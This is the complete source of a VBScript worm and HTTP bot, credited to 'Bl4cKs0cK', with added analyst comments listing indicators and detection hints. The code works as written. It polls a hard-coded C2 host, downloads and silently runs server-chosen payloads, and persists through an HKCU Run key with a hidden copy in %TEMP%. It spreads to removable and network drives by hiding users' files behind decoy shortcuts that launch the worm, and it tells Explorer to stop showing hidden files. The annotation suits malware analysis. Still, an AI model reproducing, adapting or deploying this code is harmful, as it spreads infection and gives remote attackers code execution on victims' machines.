  1. 'Microsoft (R) Windows Script Host Version 5.8'
  2. 'Copyright (C) Microsoft Corporation. All rights reserved.
  3.  
  4. '<coded by Bl4cKs0cK>'
     ' ANALYSIS NOTE: this is a VBScript worm / HTTP bot sample, annotated here for
     ' defenders and analysts. It must not be run outside an isolated lab.
     '
     ' Behaviour visible in this file:
     '   * C2 over cleartext HTTP GET to http://realy.mooo.com/bot/lancer/index.php?cmd=...
     '     (serv_cmd). Nothing it downloads is authenticated or integrity-checked.
     '   * Persistence: HKCU\...\CurrentVersion\Run\SysinfY2X (infect_registre) pointing at a
     '     hidden+system copy of itself in %TEMP%\SysinfY2X.db (protect_del / infect_machin).
     '   * Spreading: copies itself as Manuel.doc to the root of removable/network/CD drives,
     '     hides every file and folder there and drops look-alike .lnk files that run
     '     cmd.exe -> "start wscript /e:VBScript.Encode Manuel.doc" (infect_drives).
     '   * Self-update and payload drop from server-supplied <from>/<size>/<to>/<lancer>
     '     records, executed with "cmd /c start <lancer> %temp%\<to>" (bot_up).
     '   * Kills and cleans up the previous variant "SysinfYhX.db" (kill_old).
     ' Every procedure runs under On Error Resume Next, so a failing statement is silently
     ' skipped and execution continues with whatever value the variable held before.
  5. On Error Resume Next
  6. Dim host
  7. host = "realy.mooo.com" 'hard-coded C2 host (network IOC)
  8. Dim host_script
  9. host_script = "bot/lancer/index.php" 'C2 endpoint; commands are passed as ?cmd=
  10. Dim activ_name
  11. activ_name = "SysinfY2X.db" 'file name of the active copy that lives in %TEMP% (host IOC)
  12. Dim passiv_name
  13. passiv_name = "Manuel.doc" 'file name of the dormant copy dropped on drive roots (infect_drives)
  14. Dim sleep_time
  15. sleep_time = 2000 'per-iteration sleep of the main loop, ms
  16. Dim sleep_time_limit
  17. sleep_time_limit = 60000 'default C2 check-in interval, ms (overridden by the "ping" reply)
  18. Dim http
  19. Set http = CreateObject("MSXML2.ServerXMLHTTP") 'single shared HTTP client used for all C2 traffic (serv_cmd, bot_up)
  20. Dim sh
  21. Set sh = WScript.CreateObject("WScript.Shell")
  22. Dim fs
  23. Set fs= CreateObject("Scripting.FileSystemObject") 'used for every file copy, attribute change and delete below
  24. Dim WMIService
  25. Set WMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2") 'WMI under the current user's token; used for Win32_Process queries and Terminate
  26. Const adTypeBinary = 1
  27. Const adTypeText = 2
  28. Const adSaveCreateOverWrite = 2
  29. Const adSaveCreateNotExist = 1
  30. Dim stream_self
  31. Set stream_self = CreateObject("Adodb.Stream")'binary stream holding this script's own bytes; source of every self-copy
  32. Dim script_name
  33. script_name = Wscript.ScriptName
  34. Dim tmp_dir
  35. tmp_dir = sh.ExpandEnvironmentStrings("%temp%") & "\"
  36. host = "http://" & host & "/" 'cleartext HTTP, no TLS
  37. stream_self.Type = adTypeBinary 'raw bytes, so the copy is exact
  38. stream_self.Open
  39. stream_self.LoadFromFile fs.GetFile(Wscript.ScriptFullName) 'read the running script into the stream
  40. Dim script_size
  41. script_size = stream_self.Size 'file size doubles as the "version" identifier throughout
     ' Dispatch on how we were started: under the active name (from %TEMP%) run the bot loop;
     ' otherwise (e.g. launched as Manuel.doc from a drive root) install and exit.
  42. If (script_name = activ_name) Then
  43. Dim serv_rep, cont, cont_limit
  44. cont = 0
  45. cont_limit = CInt(sleep_time_limit / sleep_time) '60000/2000 = 30 iterations of 2 s between C2 check-ins
  46. While True
  47. infect_drives 'spread to attached drives
  48. infect_registre '(re)write the Run key and Explorer hidden-files setting
  49. protect_del 'ensure the %TEMP% copy still exists and matches this script
  50. kill_old("SysinfYhX.db") 'terminate and remove the previous variant that deployed this one
  51. If cont < cont_limit Then
  52. cont = cont + 1
  53. wscript.sleep sleep_time
  54. Else
  55. cont = 0
  56. serv_rep = serv_cmd("ping") 'check in with the C2; the reply is the new check-in interval in ms
  57. If serv_rep <> "-1" Then 'a non-200 reply is reported as "-1"
     ' NOTE(review): CInt is 16-bit (max 32767); a reply above that appears to raise an
     ' overflow that On Error Resume Next swallows, leaving cont_limit unchanged.
  58. cont_limit = CInt(CInt(serv_rep) / sleep_time)
  59. serv_rep = serv_cmd(script_size & activ_name)'send "<size><name>" (no separator) so the server can decide whether a newer build exists
  60. If serv_rep <> "-1" Then
  61. If serv_rep <> "0" Then
  62. get_new_v(serv_rep) 'non-"0" reply is an update record: download, replace self, exit
  63. Else
  64. serv_rep = serv_cmd("list") 'up to date: ask for additional payloads
  65. If serv_rep <> "-1" Then
  66. get_list(serv_rep) 'download and launch each record in the list
  67. End If
  68. End If
  69. End If
  70. Else
  71. cont_limit = CInt(sleep_time_limit / sleep_time) 'C2 unreachable: fall back to the default interval
  72. End If
  73. End If
  74. Wend
  75. Else
  76. infect_machin 'not running from %TEMP%: install the active copy and exit
  77. End if
  78. Function serv_cmd(cmd)
      ' Send one command to the C2 as a cleartext HTTP GET and return the response body.
      ' cmd     - command string; appended to the URL verbatim (no URL encoding).
      ' returns - http.ResponseText on HTTP 200, the string "-1" otherwise.
      ' Uses the shared global http object. With no network, Send raises, the error is
      ' swallowed by On Error Resume Next, and the non-200 Status path yields "-1".
  79. On Error Resume Next
  80. Dim stat
  81. http.Open "GET", host & host_script & "?cmd=" & cmd , False 'synchronous GET; command travels in the query string
  82. http.Send
  83. stat = http.Status
  84. If stat <> 200 Then
  85. serv_cmd = "-1" 'any failure is collapsed to "-1" for the caller
  86. Else
  87. serv_cmd=http.ResponseText 'server reply as text
  88. End If
  89. End Function
  90. Function bot_up(arr)
      ' Download one payload described by a get_split() record into %TEMP% and launch it.
      ' arr(1) from   - URL to fetch
      ' arr(2) size   - expected size of the existing file (server-supplied)
      ' arr(3) to     - file name to write under tmp_dir
      ' arr(4) lancer - launcher string placed in front of the path in the start command
      ' returns True when a file was written and launched, False otherwise (download
      ' failed, or a file of the expected size was already present).
      ' SECURITY NOTE: the only "validation" is a size comparison, and only when the file
      ' already exists. Nothing is hashed or signed and the transport is cleartext HTTP, so
      ' whoever controls the host name, the path or the network can deliver arbitrary
      ' content that is then executed with a server-chosen launcher.
  91. On Error Resume Next
  92. Dim stat, frm_, size_, to_, lnc_
  93. frm_ = arr(1)
  94. size_ = arr(2)
  95. to_ = arr(3)
  96. lnc_ = arr(4)
  97. Dim stream
  98. Set stream = CreateObject("Adodb.Stream") 'binary stream used to persist the HTTP body to disk
  99. stream.Type = adTypeBinary
  100. stream.Open
  101. If fs.FileExists (tmp_dir & to_) Then
  102. If fs.GetFile(tmp_dir & to_).Size <> size_ Then
  103. http.Open "GET", frm_, False
  104. http.Send
  105. If http.Status <> 200 Then
  106. bot_up = False
  107. Else
  108. stream.Write http.ResponseBody
  109. fs.GetFile(tmp_dir & to_).Attributes=2 'clear read-only/system so the delete succeeds
  110. fs.DeleteFile tmp_dir & to_, True
  111. stream.SaveToFile tmp_dir & to_, adSaveCreateOverWrite
  112. fs.GetFile(tmp_dir & to_).Attributes=1+2+4 'read-only + hidden + system
  113. bot_up = True
  114. End If
  115. Else
  116. bot_up = False 'same size already present: treated as up to date, not relaunched
  117. End If
  118. Else
  119. http.Open "GET", frm_, False
  120. http.Send
  121. If http.Status <> 200 Then
  122. bot_up = False
  123. Else
  124. stream.Write http.ResponseBody
  125. stream.SaveToFile tmp_dir & to_, adSaveCreateOverWrite
  126. fs.GetFile(tmp_dir & to_).Attributes=1+2+4 'read-only + hidden + system
  127. bot_up = True
  128. End If
  129. End If
  130. stream.Close
  131. If bot_up Then
       ' Launch via cmd with the server-supplied launcher (e.g. an interpreter name) in
       ' front of the %temp% path; window style 0 keeps it invisible.
  132. sh.Run "cmd /c start " & lnc_ & " %temp%\" & to_, 0
  133. End If
  134. End Function
  135. Function get_split(in_)
       ' Parse one C2 record of the form
       '   <from>URL<br><size>N<br><to>NAME<br><lancer>LAUNCHER<br>
       ' into Array(ok, from, size, to, lancer). ok (index 0) is False when any field is
       ' empty or a single space; callers check it before passing the array to bot_up.
       ' Missing tags make the inner Split index out of range; the error is swallowed and
       ' the default "" stays, which then fails the ok check.
       ' NOTE(review): CInt is 16-bit, so a <size> above 32767 likely raises and leaves
       ' ret(2) at its default 0, which does not fail the "" check.
  136. On Error Resume Next
  137. Dim ret
  138. ret = Array(True, "", 0, "", "")
  139. ret(1) = Split(Split(in_, "<from>")(1), "<br>")(0)
  140. ret(2) = CInt(Split(Split(in_, "<size>")(1), "<br>")(0))
  141. ret(3) = Split(Split(in_, "<to>")(1), "<br>")(0)
  142. ret(4) = Split(Split(in_, "<lancer>")(1), "<br>")(0)
  143. For Each a In ret 'a is never declared; implicit variable
  144. If a = "" Or a = " " Then
  145. ret(0) = False
  146. Exit For
  147. End If
  148. Next
  149. get_split = ret
  150. End Function
  151. Function get_new_v(req)
       ' Self-update. req is the record returned for the "<size><name>" version query.
       ' Downloads and launches the new build via bot_up; if it was written under a
       ' different file name than the running script, removes this script's Run key and
       ' deletes the running file. Exits the process either way once the update launched.
       ' If the name is unchanged the Run key is kept and already points at the new file.
  152. On Error Resume Next
  153. Dim data_
  154. data_ = get_split(req)
  155. If data_(0) Then
  156. If bot_up(data_) Then
  157. If data_(3) <> script_name Then
  158. del_registre
  159. fs.GetFile(Wscript.ScriptFullName).Attributes=2 'drop read-only/system so the self-delete succeeds
  160. fs.DeleteFile Wscript.ScriptFullName, True
  161. End If
  162. wscript.quit
  163. End If
  164. End If
  165. End Function
  166. Function get_list(req) 'process the reply to the "list" C2 command
       ' req is "0" (nothing to do) or several get_split records joined by "<list>".
       ' Each well-formed record is downloaded and launched with bot_up.
       ' returns True when a list was processed, False when req was "0".
  167. On Error Resume Next
  168. If req <> "0" Then
  169. Dim tbl
  170. tbl = Split(req, "<list>")
  171. For Each case_ In tbl 'case_ is never declared; implicit variable
  172. Dim data_
  173. data_ = get_split(case_)
  174. If data_(0) Then
  175. bot_up(data_) 'result ignored; the parentheses pass a ByVal copy, which is fine since bot_up only reads arr
  176. End If
  177. Next
  178. get_list = True
  179. Else
  180. get_list = False
  181. End If
  182. End Function
  183. Function infect_machin 'host installation; same copy-if-size-differs logic as infect_drives
       ' Called when the script is NOT running under the active name (e.g. as Manuel.doc
       ' from a drive root). Writes the Run key, places a read-only/hidden/system copy of
       ' itself in %TEMP%\<activ_name>, starts that copy (unless a wscript.exe with that
       ' name in its command line is already running) and exits the current process.
       ' returns True when a copy was (re)written, False when an identical-size copy existed.
  184. On Error Resume Next
  185. infect_registre
  186. If fs.FileExists (tmp_dir & activ_name) Then
  187. If fs.GetFile(tmp_dir & activ_name).Size <> script_size Then
  188. fs.GetFile(tmp_dir & activ_name).Attributes=2 'clear read-only/system before deleting
  189. fs.DeleteFile tmp_dir & activ_name, True
  190. stream_self.SaveToFile tmp_dir & activ_name, adSaveCreateOverWrite
  191. fs.GetFile(tmp_dir & activ_name).Attributes=1+2+4 'read-only + hidden + system
  192. infect_machin = True
  193. Else
  194. infect_machin = False
  195. End If
  196. Else
  197. stream_self.SaveToFile tmp_dir & activ_name, adSaveCreateNotExist
  198. fs.GetFile(tmp_dir & activ_name).Attributes=1+2+4
  199. infect_machin = True
  200. End If
  201. If infect_machin Then
       ' Replace(path," ", chr(34)&" "&chr(34)) wraps each space in double quotes so a
       ' %TEMP% path containing spaces survives cmd's argument splitting. /e:VBScript.Encode
       ' forces the encoded-script engine; presumably the distributed copy is encoded, the
       ' paste itself is plaintext.
  202. sh.Run "cmd /c start wscript /e:VBScript.Encode " & Replace(tmp_dir & activ_name," ", ChrW(34) & " " & ChrW(34)), 0
  203. Else
  204. Dim colItms
       ' Avoid a second instance: look for a running wscript.exe whose command line
       ' mentions the active file name.
  205. Set colItms = WMIService.ExecQuery ("Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%" & activ_name & "%'")
  206. If colItms.Count = 0 Then
  207. sh.Run "cmd /c start wscript /e:VBScript.Encode " & Replace(tmp_dir & activ_name," ", ChrW(34) & " " & ChrW(34)), 0
  208. End If
  209. Set colItms = Nothing
  210. End If
  211. wscript.quit 'the launcher instance never continues into the main loop
  212. End Function
  213. Sub infect_drives 'spread to every ready non-system drive of type removable / network / CD-ROM
       ' For each such drive root:
       '   1. write (or refresh) a read-only/hidden/system copy of this script as <passiv_name>;
       '   2. set every regular file to hidden+system and drop <name>.lnk beside it that runs
       '      cmd.exe /c start wscript /e:VBScript.Encode <passiv_name> & start <name> & exit,
       '      borrowing the file type's registered icon so the shortcut looks like the original;
       '   3. do the same for every sub-folder, opening it with "start explorer <name>".
       ' The .lnk files rely on the drive root being the working directory when opened
       ' (WorkingDirectory is left empty). Detection: .lnk files at a drive root whose target
       ' is cmd.exe with "wscript /e:VBScript.Encode" in the arguments, and a hidden Manuel.doc.
  214. On Error Resume Next
  215. Dim sys_drive
  216. sys_drive = sh.ExpandEnvironmentStrings("%SYSTEMDRIVE%")
  217. For Each cle In fs.Drives
  218. If cle.isReady And (cle.DriveType = 1 Or cle.DriveType = 3 Or cle.DriveType = 4) Then 'FSO DriveType 1 = removable, 3 = network, 4 = CD-ROM; fixed disks (2) are skipped
  219. Dim d
  220. d = cle.path
  221. If d <> sys_drive Then 'never touch the system drive here
  222. If fs.FileExists(d & "\" & passiv_name) Then 'copy present: replace it if its size differs and there is room
  223. If (fs.GetFile(d & "\" & passiv_name).Size <> script_size) And (cle.FreeSpace > Abs(fs.GetFile(d & "\" & passiv_name).Size - script_size)) Then
  224. fs.GetFile(d & "\" & passiv_name).Attributes=2 'clear read-only/system so the delete succeeds
  225. fs.DeleteFile d & "\" & passiv_name, True
  226. stream_self.SaveToFile d & "\" & passiv_name, adSaveCreateOverWrite
  227. End If
  228. Else 'no copy yet: create one if it fits
  229. If cle.FreeSpace > script_size Then
  230. stream_self.SaveToFile d & "\" & passiv_name, adSaveCreateNotExist
  231. End If
  232. End If
  233. fs.GetFile(d & "\" & passiv_name).Attributes=1+2+4 'read-only + hidden + system on the dropped copy
  234. If cle.FreeSpace > 0 Then
  235. For Each f In fs.GetFolder(d & "\").Files
  236. Dim f_ext
  237. If instr(f.name, ".") Then
  238. Dim f_name
  239. f_name = split(f.name, ".")
  240. f_ext = lcase( f_name(ubound(f_name)) ) 'lower-cased last extension
  241. Else
  242. f_ext = "NULL" 'sentinel for files without an extension
  243. End if
       ' Skip shortcuts, our own copy, and files already set to exactly hidden+system
       ' (i.e. processed on an earlier pass).
  244. If f_ext <> "lnk" And f.name <> passiv_name And f.Attributes <> 2+4 Then
  245. f.Attributes = 2+4 'hide the real file (hidden + system)
  246. If fs.FileExists(d & "\" & f.name & ".lnk") Then
  247. fs.GetFile(d & "\" & f.name & ".lnk").Attributes = 0 'make an existing decoy writable again before overwriting it
  248. End If
  249. Dim shurt, s_icon 'decoy shortcut that runs cmd.exe with the arguments below
  250. Set shurt = sh.CreateShortcut(d & "\" & f.name & ".lnk")
  251. shurt.WindowStyle = 7 'minimized, so the cmd window is not noticed
  252. shurt.TargetPath = "cmd.exe"
  253. shurt.WorkingDirectory = ""
  254. Dim f_arg 'run the worm copy with the encoded-script engine, then open the real (hidden) file
  255. f_arg = "/c start wscript /e:VBScript.Encode " & Replace(passiv_name," ", ChrW(34) & " " & ChrW(34)) & " & start " & replace( f.name," ", ChrW(34) & " " & ChrW(34))
  256. shurt.Arguments = f_arg & " & exit" 'close the cmd window afterwards
  257. s_icon = sh.regread("HKLM\SOFTWARE\Classes\" & sh.regread("HKLM\SOFTWARE\Classes\." & f_ext & "\") & "\DefaultIcon\")' look up the registered DefaultIcon for this extension's ProgId
  258. If ( instr(s_icon, ",") = 0 ) Or f_ext = "NULL" Then
  259. shurt.IconLocation = f.path 'no usable registered icon: use the file's own icon
  260. Else
  261. shurt.IconLocation = s_icon
  262. End if
  263. shurt.Save()
  264. fs.GetFile(d & "\" & f.name & ".lnk").Attributes = 1 'read-only so casual deletion fails
  265. End if
  266. Next
  267. For Each ff In fs.GetFolder(d & "\").SubFolders
  268. If ff.Attributes <> 2+4 Then 'skip folders already hidden on a previous pass
  269. ff.Attributes = 2+4
  270. If fs.FileExists(d & "\" & ff.name & ".lnk") Then
  271. fs.GetFile(d & "\" & ff.name & ".lnk").Attributes = 0
  272. End If
  273. Dim shurt_, s_icon_
  274. Set shurt_ = sh.CreateShortcut(d & "\" & ff.name & ".lnk")
  275. shurt_.WindowStyle = 7
  276. shurt_.TargetPath = "cmd.exe"
  277. shurt_.WorkingDirectory = ""
  278. Dim ff_arg 'run the worm copy, then open the real folder in Explorer
  279. ff_arg = "/c start wscript /e:VBScript.Encode " & Replace(passiv_name," ", ChrW(34) & " " & ChrW(34)) & " & start explorer " & replace( ff.name," ", ChrW(34) & " " & ChrW(34))
  280. shurt_.Arguments = ff_arg & " & exit"
  281. s_icon_ = sh.regread("HKLM\SOFTWARE\Classes\Folder\DefaultIcon\") 'standard folder icon
  282. If instr(s_icon_, ",") = 0 Then
  283. shurt_.IconLocation = ff.path
  284. Else
  285. shurt_.IconLocation = s_icon_
  286. End if
  287. shurt_.save()
  288. fs.GetFile(d & "\" & ff.name & ".lnk").Attributes = 1 'read-only
  289. End If
  290. Next
  291. End If
  292. End If
  293. End If
  294. Next
  295. End Sub
  296. Sub infect_registre
       ' Persistence and concealment, both under HKCU (no elevation needed):
       '   * Run\<activ_name without extension> (i.e. "SysinfY2X") -> cmd.exe /c start wscript
       '     /e:VBScript.Encode %temp%\<activ_name>. The cmd.exe path is hard-coded to
       '     C:\WINDOWS\system32 rather than %SystemRoot%.
       '   * Explorer\Advanced\Hidden = 2, the "Don't show hidden files and folders" setting,
       '     so the hidden copies and renamed originals stay out of sight.
       ' Both values are useful host-based indicators.
  297. On Error Resume Next
  298. Dim target, reg_d
  299. target = "C:\WINDOWS\system32\cmd.exe /c start wscript /e:VBScript.Encode %temp%\" & activ_name 'autostart command
  300. reg_d = "\Software\Microsoft\Windows\CurrentVersion\Run\" & Split(activ_name, ".")(0)
  301. sh.regwrite "HKCU" & reg_d, target, "REG_SZ"
  302. reg_d = "\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden" 'Explorer "show hidden files" setting
  303. sh.regwrite "HKCU" & reg_d, 2, "REG_DWORD" '2 = do not show hidden files
  304. End Sub
  305. Sub del_registre
       ' Remove this build's own Run key (HKCU\...\Run\<activ_name without extension>).
       ' Called from get_new_v when the updated build is written under a different name.
       ' The Explorer "Hidden" setting written by infect_registre is left in place.
  306. On Error Resume Next
  307. Dim reg_d
  308. reg_d = "\Software\Microsoft\Windows\CurrentVersion\Run\" & Split(activ_name, ".")(0)
  309. sh.RegDelete "HKCU" & reg_d
  310. End Sub
  311. Function protect_del
       ' Self-repair of the %TEMP% copy, run on every main-loop iteration: recreate it if
       ' it was removed, overwrite it if its size no longer matches this script, and
       ' re-apply read-only + hidden + system. Unlike infect_machin this overwrites in
       ' place without deleting first. No return value is assigned (evaluates to Empty).
  312. On Error Resume Next
  313. If fs.FileExists (tmp_dir & activ_name) Then
  314. If fs.GetFile(tmp_dir & activ_name).Size <> script_size Then
  315. fs.GetFile(tmp_dir & activ_name).Attributes=2 'drop read-only/system so the overwrite is allowed
  316. stream_self.SaveToFile tmp_dir & activ_name, adSaveCreateOverWrite 'rewrite the copy from this script's bytes
  317. End If
  318. Else
  319. stream_self.SaveToFile tmp_dir & activ_name, adSaveCreateNotExist
  320. End If
  321. fs.GetFile(tmp_dir & activ_name).Attributes=1+2+4 'read-only + hidden + system
  322. End Function
  323. Function kill_old(old_name)'retire the previous variant so the new file name takes over
       ' old_name - file name of the superseded build (the caller passes "SysinfYhX.db").
       ' Terminates every wscript.exe whose command line contains old_name (WQL LIKE with
       ' % wildcards), deletes its HKCU Run key (old_name without extension) and removes
       ' its copy from %TEMP%. No return value is assigned.
  324. On Error Resume Next
  325. Dim colItems, reg_d
  326. Set colItems = WMIService.ExecQuery ("Select * from Win32_Process Where Name = 'wscript.exe' AND CommandLine LIKE '%" & old_name & "%'")
  327. For Each objItem in colItems 'objItem is never declared; implicit variable
  328. objItem.Terminate
  329. Next
  330. colItems = Nothing 'missing Set: this raises and is swallowed; the object is not released here
  331. reg_d = "\Software\Microsoft\Windows\CurrentVersion\Run\" & Split(old_name, ".")(0)
  332. sh.RegDelete "HKCU" & reg_d
  333. fs.GetFile(tmp_dir & old_name).Attributes=2 'clear read-only/system so the delete succeeds
  334. fs.DeleteFile tmp_dir & "\" & old_name, True 'tmp_dir already ends in "\", giving a doubled separator that Windows tolerates
  335. End Function